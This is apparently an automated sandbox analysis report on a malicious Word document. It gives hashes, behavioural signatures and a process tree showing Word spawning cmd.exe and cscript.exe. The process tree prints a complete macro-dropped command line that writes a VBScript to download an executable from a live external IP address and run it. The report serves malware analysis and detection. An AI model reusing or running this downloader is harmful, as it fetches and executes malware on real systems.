Analysis
- max time kernel: 185s
- max time network: 188s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28-11-2022 00:40
Behavioral task: behavioral1
- Sample: 2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc
- Resource: win7-20221111-en
Behavioral task: behavioral2
- Sample: 2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc
- Resource: win10v2004-20221111-en
General
- Target: 2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc
- Size: 35KB
- MD5: 5dab27a18a2851cf1dcae95662a01906
- SHA1: fc7ebf9cbc7e5e794474775b3ca457cacde46d6a
- SHA256: 2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3
- SHA512: f11a17c1b905053073ac651085079cb96c2eec4e7b02661c329cd0241a9d91caab5ab8ad527bba057ffc6b739d3134774c9a7601a80d00cae3c2b1e929d88256
- SSDEEP: 384:HaQ2RBJwytUXWsIFdzHe60HZ0jpwXzVF:QBaXWFJe15kozVF
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process):
  - Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3444 | 2348 | cmd.exe | WINWORD.EXE
- Blocklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
  - 81 | 3396 | cscript.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
  - Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description | ioc | process):
  - Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes (pid | process):
  - 2348 | WINWORD.EXE (2 occurrences)
- Suspicious use of SetWindowsHookEx (7 IoCs)
  Processes (pid | process):
  - 2348 | WINWORD.EXE (7 occurrences)
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes (description | pid | process | target process):
  - PID 2348 wrote to memory of 3444 | 2348 | WINWORD.EXE | cmd.exe (2 occurrences)
  - PID 3444 wrote to memory of 3396 | 3444 | cmd.exe | cscript.exe (2 occurrences)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 2348, depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2ae16de2ce0f90a0f921946a2a43d4b5220eff195f3e4cde23c3e67a8173f8b3.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe (PID 3444, depth 2)
    Command line: cmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://148.251.87.253/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo .type = 1 >>gyuFYFGuig.vbs & @echo .open>>gyuFYFGuig.vbs & @echo .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbs
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cscript.exe (PID 3396, depth 3)
      Command line: cscript.exe gyuFYFGuig.vbs
      - Blocklisted process makes network request
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Temp\gyuFYFGuig.vbs
  Filesize: 606B
  MD5: 3911c42e02a3705d35980faec92a4ed1
  SHA1: 34aa53e0f129c0c0041bfe920c621b8e67c44ae0
  SHA256: 1097f0919b117a1e3b3a9712bdcca875626d191d006f494acd01d5e2a1b154ed
  SHA512: fe062a466ec43509a9e720832d9b9c09e8a37808fb27e96e05dc6d50ab79d599486d73de3c3966fea2d55621d43ed7d8cbdba6c99edf198c6f7091bcafefa867
- memory/2348-133-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp (Filesize: 64KB)
- memory/2348-134-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp (Filesize: 64KB)
- memory/2348-135-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp (Filesize: 64KB)
- memory/2348-136-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp (Filesize: 64KB)
- memory/2348-137-0x00007FFEFC0B0000-0x00007FFEFC0C0000-memory.dmp (Filesize: 64KB)
- memory/2348-138-0x00007FFEFA050000-0x00007FFEFA060000-memory.dmp (Filesize: 64KB)
- memory/2348-139-0x00007FFEFA050000-0x00007FFEFA060000-memory.dmp (Filesize: 64KB)
- memory/3396-141-0x0000000000000000-mapping.dmp
- memory/3444-140-0x0000000000000000-mapping.dmp